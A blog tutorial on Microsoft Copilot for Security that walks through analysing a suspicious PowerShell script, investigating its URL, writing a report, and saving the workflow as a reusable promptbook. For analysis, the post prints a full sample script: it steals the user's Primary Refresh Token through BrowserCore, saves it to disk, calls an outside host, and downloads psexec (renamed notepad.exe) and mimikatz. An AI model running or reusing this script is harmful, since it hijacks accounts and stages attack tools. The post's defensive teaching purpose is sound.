You dont have javascript enabled! Please enable it! Create Promptbooks In Microsoft Copilot For Security - CHARBEL NEMNOM - MVP | MCT | CCSP | CISM - Cloud & CyberSecurity

Create Promptbooks in Microsoft Copilot for Security

12 Min. Read

Microsoft Copilot for Security integrates seamlessly with various Microsoft security tools and third-party plugins, offering a comprehensive solution for security operations. From analyzing scripts to generating reports and creating customizable promptbooks, Copilot for Security empowers users to automate tasks, accelerate investigations, and enhance overall security posture.

This guide will show you how to use Copilot for Security to analyze a potentially malicious script and create a promptbook to automate future investigations and accelerate your SOC team.

Let’s dive in!

Microsoft Copilot for Security

The Microsoft Copilot for Security is a dedicated product but also a Framework that Microsoft integrated into different security tools, such as Microsoft Intune, Microsoft Entra, Microsoft Purview, Microsoft Sentinel, Defender, third-party partners, plugins, and more.

Microsoft defines it as follows: “Copilot for Security is an AI cybersecurity product that enables security professionals to respond to cyber threats quickly, process signals at the machine, and assess risk exposure in minutes.” But what does this mean?

Copilot for Security uses the latest and most promising technology, Transformer Models, or, more precisely, large language models (LLMs). These models are highly accurate when it comes to understanding and responding to prompts or questions. When applied to Microsoft’s security tool suite, they unlock a whole new level of potential.

Microsoft Threat Intelligence - Copilot for Security
Microsoft Threat Intelligence – Copilot for Security

Copilot for Security is a tool that can be enhanced with third-party plugins and promptbooks. A promptbook is a collection of prompts that help with common tasks. Additionally, the Security Copilot allows you to integrate your knowledge bases and documents. These can be used to provide answers to questions that may arise.

Prerequisites

To follow this guide, you need to have the following:

1) Azure subscription — If you don’t have an Azure subscription, you can create one here for free.

2) Microsoft Copilot for Security enabled — Copilot for Security capacity is billed monthly via a new Security Compute Unit (SCU) at the rate of “$4 per SCU per hour”. Microsoft recommends provisioning 3 SCUs ($4 X 3 = $12 per hour) to start Copilot for Security exploration. If we do a quick math, this will land at 730h X $4 (1 SCU as a minimum) = $2,920/Month. There is no free trial for Copilot for Security.

As a side note, we know there are many “guides” that discuss the provisioning/de-provisioning/repeating regarding the capacity plan to reduce cost. We advise you not to perform repeated provisioning/de-provisioning processes throughout the 24 hours because Microsoft hasn’t ever stated this repeated process as “supported.”

How to scope Copilot for Security SCUs: You can use the Azure pricing calculator, which now has Copilot for Security, to price your SCU metrics (Copilot for Security Pricing Calculator). Another tip is to track the team’s prompt usage per hour compared to the Copilot for Security usage monitoring dashboard. This will give you an estimated idea of how many prompts the team can generate per hour and how many SCUs they need to scale up.

Related: Check how to set up Copilot for Security Capacity.

3) To create Copilot for Security capacity, you must be an Azure Owner or Contributor, at least at the resource group level. You must also have a Global Administrator or Security Administrator role to set up the default environment.

  • Contributors can access Copilot, but Copilot responses will vary based on existing user permissions to Microsoft Security products. After setup, Owners can manage access from the role assignment page. Using security groups instead of individual users to assign Copilot for Security roles is highly recommended, which reduces administrative complexity. Learn more about Copilot for Security access.

Important! — For those that might not be aware, when you provision Copilot for Security for the first time, the group “everyone” is automatically added to the Contributor role, as shown in the figure below. This needs to be changed immediately since the Contributor role provides much access to areas with Copilot for Security. Microsoft decided to enable the embedded experience for everyone, but it can catch administrators off guard and prevent them from realizing what a Contributor role gives you.

Check the support documentation for what permissions the role Contributor gives in Copilot for Security (Understand authentication in Microsoft Copilot for Security), and see the screenshot below about what groups have defaulted to the Contributor role and the Owner role in Copilot for Security.

Copilot for Security – Role assignment
Copilot for Security – Role assignment

4) Microsoft Defender XDR license—Check the licensing requirements if you don’t have Defender XDR. Then, ensure the Microsoft Defender XDR plugin is enabled in Copilot for Security and that you have the proper permission to access Defender XDR data.

5) Microsoft Defender Threat Intelligence plugin enabled in Copilot for Security.

  • As a side note, when you provision just one Copilot for Security Compute Unit (SCU), you get Microsoft Defender Threat Intelligence (MDTI) with unlimited access to the powerful operational, tactical, and strategic threat intelligence, which costs $50k per seat value per year, at NO extra cost as part of Copilot for Security integration. This high-fidelity intelligence compendium, informed by over 78 trillion security signals and developed with Microsoft’s team of 10,000+ security experts, quickly helps security teams identify and neutralize cyber-attackers.

Assuming you have all the prerequisites, let’s look at how to analyze scripts and create a promptbook to automate future investigations.

Analyzing scripts with Copilot for Security

This is how the Copilot for Security home page looks. Copilot for Security is a generative AI platform that simplifies investigations and other SecOps workflows. It makes it easy to quickly return to prior sessions, reflecting past workflows you’ve completed in Microsoft Copilot for Security.

Microsoft Copilot for Security home page
Microsoft Copilot for Security home page

Let’s now focus on how Copilot for Security allows us to start our day. Across the middle, as shown in the figure below, we see “Featured Prompts” and common queries used in SecOps and IT work. If you’re unsure how to start, the suggested prompts are a great way to get you moving.

We also have the option to work with PROMPTBOOKS, which represents a common workflow comprising a series of prompts to accelerate the work speed and reduce manual effort. Promptbooks were one of the earliest requests from users and customers to help drive efficiency. Still, they also accomplish a secondary effect by introducing advanced concepts and workflows to operators not as experienced in complex work such as script analysis or vulnerability impact assessment.

Featured Prompts
Featured Prompts

I’m not normally the one to analyze scripts; it is typically left to someone else in our organization. So, this is a case where we need some help. Let’s see how Copilot for Security analyzes the following script. We’ll enter into the prompt bar: “Analyze the following script:,” then paste in this script:

curl vectorsandarrows.com
function Get-UserPRTToken
{
    [cmdletbinding()]
    Param()
    Process
    {
        # There are two possible locations
        $locations = @(
            "$($env:ProgramFiles)\Windows Security\BrowserCore\browsercore.exe"
            "$($env:windir)\BrowserCore\browsercore.exe"
        )
        # Check the locations
        foreach($file in $locations)
        {
            if(Test-Path $file)
            {
                $browserCore = $file
            }
        }
        if(!$browserCore)
        {
            throw "Browsercore not found!"
        }
        # Create the process
        $p = New-Object System.Diagnostics.Process
        $p.StartInfo.FileName = $browserCore
        $p.StartInfo.UseShellExecute = $false
        $p.StartInfo.RedirectStandardInput = $true
        $p.StartInfo.RedirectStandardOutput = $true
        $p.StartInfo.CreateNoWindow = $true
        # Create the message body
        $body = @"
        {
            "method":"GetCookies",
            "uri":"https://login.microsoftonline.com/common/oauth2/authorize",
            "sender":"https://login.microsoftonline.com"
        }
"@
        # Start the process
        $p.Start() | Out-Null
        $stdin =  $p.StandardInput
        $stdout = $p.StandardOutput
        # Write the input
        $stdin.BaseStream.Write([bitconverter]::GetBytes($body.Length),0,4) 
        $stdin.Write($body)
        $stdin.Close()
        # Read the output
        $response=""
        while(!$stdout.EndOfStream)
        {
            $response += $stdout.ReadLine()
        }
        Write-Debug "RESPONSE: $response"
        
        $p.WaitForExit()
        # Strip the stuff from the beginning of the line
        $response = $response.Substring($response.IndexOf("{")) | ConvertFrom-Json
        # Check for error
        if($response.status -eq "Fail")
        {
            Throw "Error getting PRT: $($response.code). $($response.description)"
        }
        # Return
        return $response.response.data
    }
}
Get-UserPRTToken > $Env:temp\prtt.bin
wget https://live.sysinternals.com/psexec.exe -outfile $Env:temp\notepad.exe
wget https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.zip -outfile $Env:temp\mechanteprune.zip
Analyzing script with Copilot for Security
Analyzing script with Copilot for Security

Next, Copilot for Security will create a new session while the orchestrator analyzes the script behind the scenes. Script analysis is a core capability provided by Copilot. It can be used in the standalone portal or leveraged within embedded experiences like Microsoft Defender XDR. By providing this flexibility, we meet operators where they work today, no matter the interface they choose to work in. This helps address complexity across an ecosystem.

Copilot for Security analyzed the script in a few seconds and broke it into this easily digestible format. The breakdown below lets us understand the critical operations and sequential action it performs.

In this case, Copilot indicates that the script downloaded something from the Internet and even suggests “to treat this script as potentially harmful and investigate any system where it was run for signs of compromise.”

Analyzing the script
Analyzing the script

We may be able to identify that source, but we are unsure how to proceed. We can try wording the next prompt based on the suggestion and see where the investigation takes us. Using the cue from Copilot, we will clue in on the context it provided and prompt it to help advance the investigation.

Knowing what to do next, or even what to extract from a script to advance understanding and investigation, is a skill that can take years to develop. Even then, missing something pertinent to this type of workflow is still easy. As a senior security analyst, this would save me time by affording a quicker means to extract elements for investigation while also serving as a check to help validate nothing has been missed.

We’ll prompt it to: “Surface from the script the relevant pieces of information to investigate in Defender.”

Surface from the script the relevant pieces of information to investigate in Defender
Surface from the script the relevant pieces of information to investigate in Defender

Copilot for Security has broken down different elements that are consistent with the script execution and that we should investigate. Remarkably, it has also taken a step for us to help refine the investigation. In the background, the orchestrator, which rationalizes how to respond to our prompt, generated a KQL statement based on the dialogue and hunted across Microsoft Defender for any interactions correlating with the information suggested for investigation.

Generated a KQL statement
Generated a KQL statement

We can view the critical information found by the hunt about the script execution by clicking the table display, as shown in the figure below, and exporting it to Excel if needed. It shows more about the script, the time it ran, which workstations, the user accounts that ran it, and even the external URL it interacted with. We can use this information to better inform the next steps we will take, and we’ll do that by learning more about the URL.

Output of the KQL query
Output of the KQL query

We’ll follow Copilot’s guidance for the investigation and focus on the script’s external URL to download files to the local machine. Next, let’s prompt, “What is known about the URL? Is it malicious if so, why?

This prompt is great for several reasons, primarily its ability to show why Copilot for Security is unique in how it is built to best answer you as a user.

Let’s break down the first part of the prompt. It is a challenge to the orchestrator. Where can it go and figure out what is known about the URL? It will need to consult the available plugins.

What is known about the URL? Is it malicious if so, why?
What is known about the URL? Is it malicious if so, why?

Could the orchestrator, for example, figure out what is known through Microsoft Defender External Attack Surface Management (Microsoft Defender EASM)? Could it get it from a different defender hunting table? Is that information cataloged in observations captured by Microsoft Sentinel? Maybe a specialized threat intelligence source or even a customized plugin?

There are any number of different possible sources where it could answer that question, and that’s part of what the orchestrator does – it has to determine the best way to respond to the prompt given the plugins that are available to it. If we had disabled one of the following plugins or didn’t have access to it as a user, it would affect the range of possible answers.

Manage Copilot for Security Plugins
Manage Copilot for Security Plugins

Let’s break down the second part of the prompt, “Is it malicious? If so, why?

The second part of this prompt becomes more interesting because it beautifully and eloquently represents a challenge all AI solutions should address with Responsible AI, but only Copilot for Security does it quite this way.

So, we are asking Copilot for Security for an opinion. Microsoft has designed the platform so that when responding to an opinion, it must substantiate its response using responsible AI principles. The elements of responsible AI that are built into the platform emerge here. As we see in the response below, they show how they selected the “Microsoft Defender Threat Intelligence” plugin, they demonstrate what data is passed in, and finally, in the response, they substantiate how they arrived at the conclusion.

We can see the reasoning that Copilot used for its analysis, and they are empowered to validate any points by citing supporting information.

What is known about the external URL? Is it malicious if so, why?
What is known about the external URL? Is it malicious if so, why?

Suppose we click on the “Intel Profile” link in the response. In that case, it redirects to the exact source of information in the Microsoft Defender portal (Home > Intel Profiles > Manatee Tempest), leveraged to respond, as shown in the figure below, and that’s an incredible outcome. These are all different levels of commitment related to responsible AI and transparency. It allows you to adhere to the old security adage of trust but verify. And with any AI solution, no matter where you are operating, understand the Responsible AI (RAI) principles and transparency made available to you to leverage your intellect and truly operate with a Copilot.

Manatee Tempest
Manatee Tempest

We’ve now reached the point where we feel we need to pass our investigation thus far along to our team; with Copilot, we’ve got a few options. One option is to generate a report, so we are going to ask Copilot to “Write a report summarizing the investigation.”

Report writing is something everyone has to do, and universally, no one likes to do it, right? ;-). It takes time to aggregate all the proper information and express all the key points clearly. One of the things that helps the most with Copilot for Security is easily summarizing everything within the context of my workflow to date.

Microsoft Copilot for Security will look back at the session, which is comprised of all of the prompts and responses, to build the narrative of the workflow. While we may not be the best at conveying the key points, Copilot can help, and we can, as necessary, provide additional instruction to amend the report to our desired output and audience beyond the simple form we’ve asked for here.

Write a report summarizing the investigation
Write a report summarizing the investigation

The report was completed in under <1 minute and 22 seconds>, way faster than we could’ve assembled the information and certainly at a speed beyond our typing skills. This is a helpful output to inform the team what actions we’ve taken, what pertinent workflow elements should be scrutinized, and what might be further considered.

During our workflow, we have recognized that our work could be repeated and even help others take the same approach. Similarly, we could look for different ways to extend this workflow in the future. In Copilot for Security, we can accomplish this with a promptbook, and we will create a custom one from this session to share with our SOC team.

Create Promptbook in Copilot for Security

We’ll start by selecting all the prompts in this session, then click Create promptbook, as shown in the figure below.

Create Promptbook
Create Promptbook

With the custom promptbook creation menu now open, we’ll begin tailoring this workflow for our intended use. With promptbooks, we can design them for personal use, our team, or even our organization. We can also be as prescriptive as the plugins used or less deterministic, allowing the orchestrator to select the best response.

We’ll start by giving the promptbook a clear name. Next, we’ll add some tags to help find the promptbook in the library, i.e., (Script Analysis, TI, KQL, Report Writing). To round out the setup, we’ll provide a brief description articulating the workflow it helps expedite.

Promptbook Tags
Promptbook Tags

Promptbooks allow users to enter a value or values to begin the workflow. So, we need to remove any too-specific information while inserting values necessary to align the workflow with its ultimate goal.

We’ll start by modifying the first prompt to remove the script and inset a variable instead <script> allowing anyone leveraging this to include their script for analysis. The next prompts align with what the workflow needs to accomplish to advance the analysis, so we’ll leave those alone.

Please analyze this script
Please analyze this script

Ultimately, we’ll focus on what we want Promptbook to achieve for the user. We left the prompt pretty generic when we first ran it, but we’d like to make it something any team could use themselves, no matter their expertise or intended outcomes.

Script Workflow with Custom Outcome
Script Workflow with Custom Outcome

The first thing we’ll do is include a value for the audience type to allow the user to specify whether the report should target a specific audience—maybe they’ll need to provide something to their team or company leadership. No matter the case, this will provide flexibility. Next, we’ll include an option to provide different outcomes. It could be useful for Copilot for Security to provide the next steps or recommendations. Finally, we’ll allow the user to provide a formatting preference; maybe they’d like a summary, something detailed, or even a bulleted list.

We’ll enter to: “Write a report for a <audience_type>, that provides <outcome>, and is formatted to include <format_specifications>

Write a report for an audience that provides outcomes and is formatted
Write a report for an audience that provides outcomes and is formatted

With the prompts aligned to the desired workflow, we’ll specify the scope of the promptbook to “Just me“; in this example, click Create.

Specify the scope of the promptbook
Specify the scope of the promptbook

To conclude, we’ll quickly review the promptbook we just created by selecting “View.”

View saved Promptbook
View saved Promptbook

From this initial perspective, we see our custom promptbook on a familiar display, and we now have the option to run it. We’ll click “Start new session” the promptbook will load with the variables needed, followed by the prompts that will be executed after the values are provided.

Start new session
Start new session

As we can see, the promptbook will load with the variables needed (script, audience_type, outcome, and format_specifications), followed by the prompts that will execute after the values are provided. We are now taken to a new session where the promptbook will run against the custom values.

Enter custom values when running the promptbook
Enter custom values when running the promptbook

In just a few minutes, we could perform an investigation as a senior security analyst would by creating a reusable workflow as a promptbook and building it with the flexibility to be used across our organization. With Copilot for Security, the platform empowers everyone to operate as an expert, no matter the expertise.

Promptbook response
Promptbook response

That’s it—there you have it! Happy analyzing malicious scripts and creating promptbooks in Microsoft Copilot for Security!

In Conclusion

This guide has demonstrated the powerful capabilities of Copilot for Security in analyzing potentially malicious scripts and streamlining investigation workflows. By harnessing the advanced technology of Transformer Models, Copilot for Security enables security professionals to respond swiftly to cyber threats, process signals efficiently, and easily assess risk exposure.

Throughout this guide, we’ve explored how Copilot for Security integrates seamlessly with various Microsoft security tools and third-party plugins, offering a comprehensive solution for security operations. From analyzing scripts to generating reports and creating customizable promptbooks, Copilot for Security empowers users to automate tasks, accelerate investigations, and enhance overall security posture.

By following the steps outlined in this guide, security teams can leverage Copilot for Security to strengthen their defense against cyber threats and ensure a proactive approach to security operations. With its intuitive interface and robust features, Copilot for Security is a valuable asset for modern security operations centers. This common task in investigation is one such example.

Copilot for Security represents a paradigm shift in cybersecurity, enabling organizations to stay ahead of evolving threats and safeguard their digital assets effectively. Embracing Copilot for Security equips security professionals with the tools to navigate the complex cybersecurity landscape confidently and efficiently.

__
Thank you for reading my blog.

If you have any questions or feedback, please leave a comment.

-Charbel Nemnom-

Photo of author
About the Author
Charbel Nemnom
Charbel Nemnom is a Senior Cloud Architect with 21+ years of IT experience. As a Swiss Certified Information Security Manager (ISM), CCSP, CISM, Microsoft MVP, and MCT, he excels in optimizing mission-critical enterprise systems. His extensive practical knowledge spans complex system design, network architecture, business continuity, and cloud security, establishing him as an authoritative and trustworthy expert in the field. Charbel frequently writes about Cloud, Cybersecurity, and IT Certifications.
Previous

Export Microsoft Sentinel Automation Rules With Ease

Secure Azure Management Group Creation – Best Practices for Enhanced Security

Next

Let us know what you think, or ask a question...